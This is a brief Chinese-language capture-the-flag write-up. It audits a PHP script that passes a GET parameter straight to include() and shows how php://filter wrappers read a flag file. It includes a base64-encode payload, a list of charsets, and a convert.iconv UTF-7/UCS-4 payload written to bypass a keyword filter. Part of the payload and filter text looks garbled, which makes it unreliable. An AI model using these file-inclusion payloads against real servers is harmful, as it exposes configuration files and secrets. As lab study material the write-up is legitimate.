1.审计代码
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
2.文件包含新姿势
除了使其运行php代码外,可以通过伪协议来读取文件,(默认flag地址/var/www/html/flag.php)
首先,用常见的
/?filename=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
来读取flag,回显do not hack
接着考虑过滤器和字符集的问题,
常见过滤器有
- onvert.base64
- convert.quoted
convert.iconv.[]
字符串过滤器
常见php可接受的字符集有
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php
于是有payload:
?filename=php://filter//convert.iconv..UTF-7.UCS-4*/resource=/var/www/html/flag.php